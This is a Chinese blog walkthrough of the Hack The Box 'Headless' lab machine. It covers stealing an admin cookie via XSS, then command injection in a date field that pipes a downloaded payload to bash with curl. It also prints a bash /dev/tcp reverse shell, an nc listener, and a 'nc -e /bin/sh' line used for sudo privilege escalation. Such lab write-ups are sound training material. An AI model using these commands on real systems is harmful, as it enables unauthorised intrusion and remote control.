hack the box(HTB) 的headless详细新手0基础wp

已于 2024-04-14 17:09:15 修改
阅读量406 收藏
点赞数 3
文章标签: web安全
于 2024-04-13 20:08:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51439723/article/details/137724014
版权

一、外网渗透

1.信息搜集

①拿到ip后先用nmap看开放的端口
在这里插入图片描述

可以看到5000端口有http信息比较可疑,直接用dirsearch扫一下:
在这里插入图片描述
其中中support是
在这里插入图片描述
试图直接在这里获得信息但是没什么回显
另一个进不去,/dashboard显示
在这里插入图片描述

那么很有可能是需要拿到授权才能进来这个页面
现在我们把关注点在再放到/support上

2.通过xss漏洞拿到admin认证

一种很常用的通过xss获取cookie的方式
在这里插入图片描述
随便输表单数据抓个包试试:
在这里插入图片描述
把这个包转到repeater中
然后在终端监听一个端口

python3 -m http.server 8001

在这里插入图片描述

再在repeater中构造数据包如下:
在这里插入图片描述
发送后监听端有了反应:

在这里插入图片描述
这时候拿到了cookie,本来以为这就是admin的cookie,但是放到浏览器中再进/dashboard是这样的:
在这里插入图片描述
观察这个字段发现是base64编码,解码后是
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
再重新把这个cookie放到浏览器,显示:
在这里插入图片描述

此时顺利拿到admin的身份

3.反弹shell

此时我们就可以考虑怎么反弹shell了

①先在本地开启一个http的端口

python3 -m http.server 8002 -d ./

这里8002是自己随便选一个和其他不冲突的端口,后面 -d ./ 意思是这个网页的根目录在当前目录
在这里插入图片描述
可以看到8002端口web服务的根目录里面有个payload.sh,之后就可以在靶机上面下载这个文件并使用
②将payload.sh的内容写成:

/bin/bash -c 'exec bash -i >& /dev/tcp/10.10.14.55/1234 0>&1'

即反弹shell的代码
其中10.10.14.55是我的ip(下文中也是),如复制需更换成自己在htb中machines的ip

③在本地再监听一个端口:

nc -nlvp 1234

在这里插入图片描述
④用bp抓/dashboard中生成的包:
在这里插入图片描述
在date字段后加要执行的代码:

;curl http://10.10.14.55:8002/payload.sh|bash

在这里插入图片描述

发送,顺利拿到shell:
在这里插入图片描述
在找一下user.txt即可:
在这里插入图片描述

二、内网渗透

sudo -l

看可以用的东西
重点发现有个/usr/bin/syscheck
在这里插入图片描述
可以

echo "nc -e /bin/sh 10.10.14.55 1212" > initdb.sh

再次反弹shell,其他步骤和上文相同

若这几步实现有困难,评论区可以和我说,我再写下

shipship--
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
hackthebox(HTB) precious 靶机!
qq_58869808的博客
12-08 1714
hackthebox preicous 靶机
HTB-writeups:此仓库包含HackTheBox的文章
05-01
"hackthebox-writeups"和"htb-machine"直接与HackTheBox平台的机器相关,表明文章详细介绍了如何攻破这些虚拟主机。 【压缩包子文件的文件名称列表】"HTB-writeups-main" 这个文件名表明压缩包内包含了主目录或...
HTB靶机渗透之headless(linux-easy)
m0_60351808的博客
03-29 1465
这个靶机难度还行,只是攻击方式很新颖,以前没接触过,一时不知道如何下手,功力还有所欠缺啊!
2024年最新HTB靶机渗透之headless(linux-easy)_headless htb(1),硬核
最新发布
2401_84140060的博客
05-09 377
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
Hack The Box-Headless
分享
03-27 684
Hack The Box-Headless 。。。该服务器存在xss和RCE漏洞!很简单,没有难度!
HTB(hack the box) FreeLancer
weixin_44215027的博客
12-21 3389
HTB(hack the box) FreeLancer 这是一道30points的web题。 提示: 你能测试我的网站有多安全吗?证明我错了,拿到flag! 进入网站: 继续往下浏览: 看到了这个,难道是xss?构造后send,提示: 看来不是xss,只能继续寻找。 然后我看到了: 一个长期存在的事实是,当读者在看一个页面的布局时,他们会被可读的内容分散注意力。 会不会在源码中? 查看...
HTB(hack the box) Fuzzy
weixin_44215027的博客
11-12 1304
HTB(hack the box) Fuzzy 一年前就已经注册了hack the box,一直没用。如今开始在这个网站上学习。把自己的经过记下来吧。(国内好像很少用,几乎都没有writeup) 首先做一道20points的web题。 问题描述: 我们已经进入了一些基础设施,我们相信这些基础设施与我们的目标的内部网络相连。我们需要你帮助获取管理员密码的网站,他们目前正在开发。 进入网站的界面: ...
Hack The Box新手教程
WRplayeR的博客
12-13 1226
ftp协议、ftp命令SMB协议、smbclient 命令redis数据库、redis-cli命令DRP远程桌面协议、xfreerdp工具命令gobuster的使用mongo数据库、mogon shell、NoSQLrsync协议、命令。
hackthebox:HTB 机器和 InfoSec 社区的笔记
08-04
黑盒子 HTB机注意事项将定期更新,旨在解开所有可能的方式并准备考试还有更多待更新创建和维护: cyberwr3nch内容向无国界医生说不!这个不断地从5月3日更新RD 2020感谢造访菜鸟cyberwr3nch :wrench: TCSC Learn and...
hackthebox-writeups:HacktheBox'boot2root'计算机的编写
05-12
hackthebox撰写HacktheBox计算机(boot2root)的文章和用西班牙语或英语编写的挑战。有关密码保护的重要说明直到2020年3月的机器写入都受到相应的根标志的保护。 但是自此日期以来,HTB标志是动态的,并且对于每个...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现需要邀请码,上网搜了搜,发现邀请码得靠自己获取,好吧,我接受这个挑战。 使用view-source:https://www.hackthebox.eu/invite,查看源代码 发现提示 发现可疑的js文件:/js/inviteapi.min.js   inviteapi  邀请接口 查看该js 在控制台进行调用,给出了提示,
vagrant-htbHackTheBox的Vagrantfile
03-01
流浪汉 Kali流浪者设置(最低) 安装工具 vim 网络工具 python3 解压缩 多路复用器 纳帕 网页壳 ...如果要添加更多,只需编辑Provision / kali.yml文件。...再一次,g,如果您想添加更多,只需将git repo...cd vagrant-htb
连接hack the box教程
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
HackTheBox 如何使用
网络安全学习
04-14 4633
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
hackthebox的网站使用教程
Ba1_Ma0的博客
03-20 1万+
Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获取验证码注册教程 网站url:https://blog.csdn.net/qq_45951598/article/details/115269108 然后我们进入网站的首页,这里我们演示的是旧ui,新ui的使用方法与旧的大致相同 使用google浏览器可以自动翻译网站上的英文,右击,然后选择翻译中文
连接Hack The Box靶场教程
Atopos545的博客
01-24 1005
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
Hackthebox】【SecNotes】
大方子
01-29 776
这次靶机是hackthebox里的SecNotes 靶机IP地址:10.10.10.97  ========================================================================================== 信息收集 nmap -sV -sC -T5 10.10.10.97 发现靶机开放了80端口和445端口 ...
hackthebox
09-11
Hack The Box (HTB) 是一个在线的渗透测试和网络安全训练平台。它提供了一系列虚拟机,供用户尝试攻击和入侵。用户可以通过解决一系列的密码学、网络、应用程序等挑战来增强他们的渗透测试技能。HTB 的目标是帮助用户了解真实世界中的网络漏洞和攻击技术,并提供一个安全的环境来进行学习和实践。 请注意,使用 Hack The Box 平台进行未经授权的攻击是违法的。这个平台仅用于合法的学习和研究目的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值